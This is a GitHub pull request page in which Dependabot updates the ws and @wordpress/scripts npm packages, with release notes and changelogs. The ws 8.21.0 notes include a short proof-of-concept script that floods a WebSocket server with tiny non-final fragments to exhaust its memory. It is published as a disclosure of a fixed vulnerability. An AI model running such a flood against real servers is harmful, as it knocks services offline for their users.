Skip to content

Bump ws and @wordpress/scripts#554

Open
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/multi-9540fa44d5
Open

Bump ws and @wordpress/scripts#554
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/multi-9540fa44d5

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jul 14, 2026

Copy link
Copy Markdown
Contributor

Bumps ws to 8.21.1 and updates ancestor dependency @wordpress/scripts. These dependencies need to be updated together.

Updates ws from 7.4.6 to 8.21.1

Release notes

Sourced from ws's releases.

8.21.1

Bug fixes

  • Empty fragments are now counted toward the limit (a2f4e7c0).
  • The default values of the maxBufferedChunks and maxFragments options have been reduced (f197ac65).

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

... (truncated)

Commits
  • ae1de54 [dist] 8.21.1
  • 8e9511b [ci] Trust Coveralls Homebrew tap
  • f197ac6 [fix] Lower default values of maxBufferedChunks and maxFragments
  • 8df8265 [ci] Update actions/checkout action to v7
  • a2f4e7c [fix] Count empty fragments toward the limit (#2329)
  • e79f912 [pkg] Approve install scripts for bufferutil and utf-8-validate
  • 4ea355d [doc] Document 32-bit signed integer coercion for option values
  • 2120f4c [example] Remove uuid dependency
  • 4c534a6 [security] Add latest vulnerability to SECURITY.md
  • bca91ad [dist] 8.21.0
  • Additional commits viewable in compare view

Updates @wordpress/scripts from 17.1.0 to 33.0.0

Release notes

Sourced from @​wordpress/scripts's releases.

23.6.0 RC1

Changelog

Features

Post Editor

  • Allow setting viewport tablet and mobile values in theme.json. (79104)
  • Experimental: Expand DataForm inspector to patterns. (79452)
  • Notes: Add @​mention autocomplete. (79604)
  • Notes: Inline (partial-text) notes via hybrid marker + strip-on-render approach. (78218)
  • Show the admin bar in the Post and Site Editor by default. (79197)

Block Editor

  • Share block-bindings context assembly between call sites. (79855)

Data Layer

  • Blocks: Add innerContent support for static inner blocks, adopt it in the HTML block. (79115)

Components

  • DataViews: Add a richtext control backed by a private RichTextControl shell in @​wordpress/components. (78471)

Block Library

  • Icons: Add PHP method(s) for rendering inline SVG icons from the registry. (78332)

Enhancements

  • CSS: Follow-up fixes to split_selector_list(). (79723)
  • Document widget relevance, help. (80007)
  • Expose widget category through the build pipeline and REST API. (79638)
  • Omnibar: Move the 'site icon in admin bar' feature from experiment to 7.1 compat. (79807)
  • Scripts: Make 'test-e2e' run Playwright and remove Puppeteer. (80058)
  • Site Editor v2 experiment: Hide admin bar in distraction-free mode. (79937)
  • Widget Dashboard: Remove layout-settings editing. (79903)
  • Widget Dashboard: Reserve paint space for tile focus rings. (79990)
  • Widget Primitives: Add WidgetAttributeField for typed attribute schemas. (79544)
  • Widgets: Add a declarative help metadata field, surfaced as a header infotip. (79830)
  • Widgets: Add attribute relevance and inline editing in the tile toolbar. (79735)
  • Widgets: Translate title, description, and keywords server-side. (79701)

Block Library

  • Accordion block: Add background gradient support. (79840)
  • Add ariaLabel supports for Tab List Block. (79948)
  • Add icon state classes to Accordion block. (74257)
  • Add layout and block spacing support to Latest Posts block. (77989)
  • Add option to exclude current post from query block. (64916)
  • Animated GIF to video conversion (via mediabunny). (78410)
  • Classic block: Remove migration notice and restore inserter availability. (79894)
  • Cover: Allow restricting video embed providers. (80092)

... (truncated)

Changelog

Sourced from @​wordpress/scripts's changelog.

33.0.0 (2026-07-14)

Breaking Changes

  • The test-e2e command now runs the Playwright-based end-to-end test runner instead of Puppeteer (test-playwright remains available as an alias). Removed the Puppeteer test environment and configuration (jest-environment-puppeteer, jest-e2e.config.js, puppeteer.config.js) along with the puppeteer-core and expect-puppeteer dependencies. Puppeteer-specific options (e.g. --puppeteer-interactive, --puppeteer-devtools) are no longer supported (#60357).

Enhancements

  • Widen React peer dependency ranges to ^18 || ^19 to support both React 18 and React 19 environments (#80024).
  • Update stylelint to ^16.26.1 (#79648).
  • Widen the @playwright/test peer dependency to >=1 and mark it optional, so consumers aren't forced to bump Playwright or satisfy it under strict peer deps (#78632).

32.6.0 (2026-07-01)

32.5.0 (2026-06-24)

Enhancements

  • lint-style: Detect .cjs and .mjs config files so the bundled default config is not used when one of these is present (#79226).

32.4.1 (2026-06-16)

32.4.0 (2026-06-10)

32.3.0 (2026-05-27)

32.2.0 (2026-05-14)

32.1.0 (2026-04-29)

32.0.0 (2026-04-15)

Breaking Changes

  • The bundled eslint dependency has been upgraded from v8 to v10 (#76654).
  • The lint-js script now uses flat config (eslint.config.*) by default. Legacy .eslintrc.* files are still detected as a fallback, but this support is deprecated and will be removed in a future version (#76654).
  • The default config shipped with wp-scripts has changed from config/.eslintrc.js to config/eslint.config.cjs (#76654).

31.8.0 (2026-04-01)

31.7.0 (2026-03-18)

31.6.0 (2026-03-04)

31.5.0 (2026-02-18)

31.4.0 (2026-01-29)

31.3.0 (2026-01-16)

... (truncated)

Commits
  • e9a74f9 chore(release): publish
  • 2a0c375 Update changelog files
  • e61c854 Merge changes published in the Gutenberg plugin "release/23.6" branch
  • 1055a35 Update changelog files
  • 8ca3e8e Merge changes published in the Gutenberg plugin "release/23.6" branch
  • 66c8050 Fix wp/latest release metadata (#79821)
  • d0d1bfc Update changelog files
  • 66315f3 Merge changes published in the Gutenberg plugin "release/23.5" branch
  • 74218a2 Update changelog files
  • 504adfc Revert "Update changelog files"
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by desrosj, a new releaser for @​wordpress/scripts since your current version.


Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    You can disable automated security fix PRs for this repo from the Security Alerts page.

Bumps [ws](https://github.com/websockets/ws) to 8.21.1 and updates ancestor dependency [@wordpress/scripts](https://github.com/WordPress/gutenberg/tree/HEAD/packages/scripts). These dependencies need to be updated together.


Updates `ws` from 7.4.6 to 8.21.1
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@7.4.6...8.21.1)

Updates `@wordpress/scripts` from 17.1.0 to 33.0.0
- [Release notes](https://github.com/WordPress/gutenberg/releases)
- [Changelog](https://github.com/WordPress/gutenberg/blob/trunk/packages/scripts/CHANGELOG.md)
- [Commits](https://github.com/WordPress/gutenberg/commits/@wordpress/scripts@33.0.0/packages/scripts)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.1
  dependency-type: indirect
- dependency-name: "@wordpress/scripts"
  dependency-version: 33.0.0
  dependency-type: direct:development
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jul 14, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants